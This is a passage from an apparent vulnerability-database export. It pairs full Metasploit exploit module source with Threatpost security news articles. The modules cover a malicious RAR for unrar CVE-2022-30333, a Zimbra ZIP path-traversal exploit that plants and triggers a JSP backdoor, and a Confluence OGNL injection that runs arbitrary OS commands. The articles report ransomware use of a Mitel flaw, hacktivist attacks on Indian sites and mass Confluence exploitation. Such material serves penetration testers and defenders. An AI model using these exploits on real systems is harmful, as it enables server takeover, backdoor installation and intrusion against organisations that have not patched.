else\n print_status('Encoding configured payload')\n payload_data = generate_payload_exe\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload_data)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:23:32", "description": "This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on the following versions of Zimbra: * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) Note that the Open Source Edition is not affected.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-23T16:43:51", "type": "metasploit", "title": "Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-23T16:44:03", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_MBOXIMPORT_CVE_2022_27925-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',\n 'Description' => %q{\n This module POSTs a ZIP file containing path traversal characters to\n the administrator interface for Zimbra Collaboration Suite. If\n successful, it plants a JSP-based backdoor within the web directory, then\n executes it.\n\n The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's\n ZIP implementation that can result in the extraction of an arbitrary file\n to an arbitrary location on the host.\n\n This issue is exploitable on the following versions of Zimbra:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\n Note that the Open Source Edition is not affected.\n },\n 'Author' => [\n 'Volexity Threat Research', # Initial writeup\n \"Yang_99's Nest\", # PoC\n 'Ron Bowes', # Analysis / module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-27925'],\n ['CVE', '2022-37042'],\n ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],\n ['URL', 'https://www.yang99.top/index.php/archives/82/'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',\n 'TARGET_FILENAME' => nil,\n 'RPORT' => 7071,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-05-10',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Create a zip file\n zip = Rex::Zip::Archive.new\n zip.add_file(target_filename, payload)\n data = zip.pack\n\n print_status('Sending POST request with ZIP file')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\",\n 'data' => data\n )\n\n # Check the response\n if res.nil?\n fail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\")\n elsif res.code == 404\n fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')\n elsif res.code != 401\n print_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\")\n end\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')\n end\n\n register_file_for_cleanup(target_filename)\n\n print_status(\"Trying to trigger the backdoor @ #{public_filename}\")\n\n # Trigger the backdoor\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n if res.nil?\n fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')\n elsif res.code == 200\n print_good('Successfully triggered the payload')\n elsif res.code == 404\n fail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\")\n else\n fail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T08:41:50", "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n", "cvss3": {}, "published": "2022-06-03T19:27:13", "type": "metasploit", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T21:11:56", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-26134'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n confluence_version = get_confluence_version\n return CheckCode::Unknown unless confluence_version\n\n vprint_status(\"Detected Confluence version: #{confluence_version}\")\n\n confluence_platform = get_confluence_platform\n unless confluence_platform\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n vprint_status(\"Detected target platform: #{confluence_platform}\")\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_platform\n # this method gets the platform by exploiting CVE-2022-26134\n return @confluence_platform if @confluence_platform\n\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\n \"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.System.getProperty('os.name')\")\n )\n }\n OGNL\n res = inject_ognl(ognl)\n return nil unless res\n\n res.headers[header]\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n confluence_platform = get_confluence_platform\n unless confluence_platform\n fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')\n end\n\n unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')\n fail_with(Failure::NoTarget, \"The target platform '#{confluence_platform}' is incompatible with '#{target.name}'\")\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n ognl = <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n res = inject_ognl(ognl, 'headers' => { header => cmd })\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(ognl, opts = {})\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')\n }.merge(opts))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-06-28T12:49:55", "description": "Ransomware groups are abusing unpatched versions of a Linux-based Mitel VoIP (Voice over Internet Protocol) application and using it as a springboard plant malware on targeted systems. The critical remote code execution (RCE) flaw, tracked as [CVE-2022-29499](<https://nvd.nist.gov/vuln/detail/CVE-2022-29499>), was first [report by Crowdstrike](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) in April as a zero-day vulnerability and is now patched.\n\nMitel is popularly known for providing business phone systems and unified communication as a service (UCaaS) to all forms of organizations. The Mitel focuses on VoIP technology allowing users to make phone calls using an internet connection instead of regular telephone lines.\n\nAccording to Crowdstrike, the vulnerability affects the Mitel MiVoice appliances SA 100, SA 400 and Virtual SA. The MiVoice provides a simple interface to bring all communications and tools together.\n\n## **Bug Exploited to Plant Ransomware **\n\nResearcher at Crowdstrike recently investigated a suspected ransomware attack. The team of researchers handled the intrusion quickly, but believe the involvement of the vulnerability (CVE-2022-29499) in the ransomware strike.\n\nThe Crowdstrike identifies the origin of malicious activity linked to an IP address associated with a Linux-based Mitel VoIP appliance. Further analysis led to the discovery of a novel remote code exploit.\n\n\u201cThe device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment,\u201d Patrick Bennet [wrote in a blog post](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>).\n\nThe exploit involves two GET requests. The first one targets a \u201cget_url\u201d parameter of a PHP file and the second one originates from the device itself.\n\n\u201cThis first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses,\u201d the researcher explained.\n\nThe second request executes the command injection by performing an HTTP GET request to the attacker-controlled infrastructure and runs the stored command on the attacker\u2019s server.\n\nAccording to the researchers, the adversary uses the flaw to create an SSL-enabled reverse shell via the \u201cmkfifo\u201d command and \u201copenssl_client\u201d to send outbound requests from the compromised network. The \u201cmkfifo\u201d command is used to create a special file specified by the file parameter and can be opened by multiple processes for reading or writing purposes.\n\nOnce the reverse shell was established, the attacker created a web shell named \u201cpdf_import.php\u201d. The original content of the web shell was not recovered but the researchers identifies a log file that includes a POST request to the same IP address that the exploit originated from. The adversary also downloaded a tunneling tool called \u201cChisel\u201d onto VoIP appliances to pivot further into the network without getting detected.\n\nThe Crowdstrike also identifies anti-forensic techniques performed by the threat actors to conceal the activity.\n\n\u201cAlthough the threat actor deleted all files from the VoIP device\u2019s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor,\u201d said Bennett.\n\nMitel released a [security advisory](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) on April 19, 2022, for MiVoice Connect versions 19.2 SP3 and earlier. While no official patch has been released yet.\n\n## **Vulnerable Mitel Devices on Shodan**\n\nThe security researcher Kevin Beaumont shared a string \u201chttp.html_hash:-1971546278\u201d to search for vulnerable Mitel devices on the Shodan search engine in a [Twitter thread](<https://twitter.com/GossiTheDog/status/1540354721931841537>).\n\nAccording to Kevin, there are approximately 21,000 publicly accessible Mitel appliances worldwide, the majority of which are located in the United States, succeeded by the United Kingdom.\n\n## **Mitel Mitigation Recommendations **\n\nCrowdstrike recommends that organizations tighten defense mechanisms by performing threat modeling and identifying malicious activity. The researcher also advised segregating the critical assets and perimeter devices to restrict the access control in case perimeter devices are compromised.\n\n\u201cTimely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,\u201d Bennett explained.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T12:42:34", "type": "threatpost", "title": "Mitel VoIP Bug Exploited in Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-28T12:42:34", "id": "THREATPOST:7F03D6D7702417D24F26A06CBC31EE83", "href": "https://threatpost.com/mitel-voip-bug-exploited/180079/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraing publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-08T10:28:56", "description": "Threat actors are using public exploits to pummel a critical zero-day remote code execution (RCE) flaw that affects all versions of a popular collaboration tool used in cloud and hybrid server environments and allows for complete host takeover.\n\nResearchers from Volexity uncovered the flaw in Atlassian Confluence Server and Data Center software over the Memorial Day weekend after they detected suspicious activity on two internet-facing web servers belonging to a customer running the software, they said in a [blog post](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) published last week.\n\n\u201cThe file was a well-known copy of the JSP variant of the China Chopper webshell,\u201d researchers wrote. \u201cHowever, a review of the web logs showed that the file had barely been accessed. The webshell appears to have been written as a means of secondary access.\u201d\n\nAtlassian released a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) the same day that Volexity went public with the flaw, warning customers that all supported version of Confluence Server and Data Center after version 1.3.0 were affected and that no updates were available. This prompted the U.S. Department of Homeland Security\u2019s Cybersecurity and Infrastructure Agency (CISA) to issue [a warning of its own](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) about the flaw.\n\nA day later, Atlassian released an update that fixes the following versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it\u2019s also strongly recommending that customers update as soon as they can. If that\u2019s not possible, the company provided in the advisory what it stressed is a \u201ctemporary\u201d workaround for the flaw by updating a list of specific files that correspond to specific versions of the product.\n\n## Threat Escalation\n\nIn the meantime, the situation is escalating quickly into one that security professionals said could reach epic proportions, with exploits surfacing daily and hundreds of unique IP addresses already throttling the vulnerability. Many versions of the affected products also remain unpatched, which also creates a dangerous situation.\n\n\u201cCVE-2022-26134 is about as bad as it gets,\u201d observed Naveen Sunkavalley, chief architect of security firm [Horizon3.ai](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUST9fX64-2FX7G8oio3HdExkfpXlsDdy0DMjoZZzh-2Fv3fxrEs2_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6Vxrf5tVuwdy9pbRo-2F8DNNu3J5mzixD3PJS7t4Hs2TYsOWw0ryNyw1-2BF9EHtf5wuqbWsxGPMD6EQsD7Nyoevetefkt7MGs-2FHajCJChJ0WWQ-2F4es5VBDN8zEwARSv6a1s6u74AUhwTSDRHOo3PP1Q1lKsA-3D>), in an email to Threatpost. Key issues are that the vulnerability is quite easy both to find and exploit, with the latter possible using a single HTTP GET request, he said.\n\nMoreover, the public exploits recently released that allow attackers to use the flaw to enable arbitrary command execution and take over the host against a number of Confluence versions\u2014including the latest unpatched version, 7.18.0, according to tests that Horizon3.ai has conducted, Sunkavaley said.\n\nIndeed, Twitter was blowing up over the past weekend with discussions about public exploits for the vulnerability. On Saturday, Andrew Morris, the CEO of cybersecurity firm [GreyNoise](<https://www.greynoise.io/>)[ tweeted](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUZeLQXFApkVnt0p2uzldsLzexNPwWwME1VqzuxM4EPRfjhNCvLBy4YB49i5LBdhVDdk3bdxl9mMqYmby3BCNH00GddZh2Met-2FQVciEWaSqj2-2BDc33IvotYb-2FqKipRNwgEsWia58Lavv8WM5npBgeBdYkvQQSrhYbzaBUUuVaSV4Rk2ztpg8TXpsMCaYdZzeKKPgLWVToUg5Ht0f9g7gPwMwtAvcwxVmnWEDON1KFUmdHIfQ-2FKAQvcO7jS7WvGtrxWKAF52KobJgne5rQpdjvE11Y-2B8djmGzI1Q21AzX5T50A9-2BpHIOYzyAUqoUEWZpFnRzzLqrMu3icBZ57LmFKNxGTRPimDUjR7T8eDeQjnWttOekKn_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxpsA5L19rY7-2Fmx-2BEGIHXPubRKCQX-2B7BpbJqtYfPildu8zaULbUO4ygo24RQuqSIch-2BeFoJjwkkjlXG4ACkLuxahlCVA2m3cewG-2B9vzjCwKJ7F5JEpNGn-2FjGZEpkypXKWLD-2BIhk5XHKrarqem-2FZDDkHA-3D>) that they had begun to see 23 unique IP addresses exploiting the Atlassian vulnerabilities. On Monday, Morris [tweeted again](<https://twitter.com/Andrew___Morris/status/1533504231876993025>) that the number of unique IP addresses attempting to exploit the flaw had risen to 400 in just a 24-hour period.\n\n## **Potential for a SolarWinds 2.0?**\n\nSunkavalley pointed out that the most obvious impact of the vulnerability is that attackers can easily compromise public-facing Confluence instances to gain a foothold into 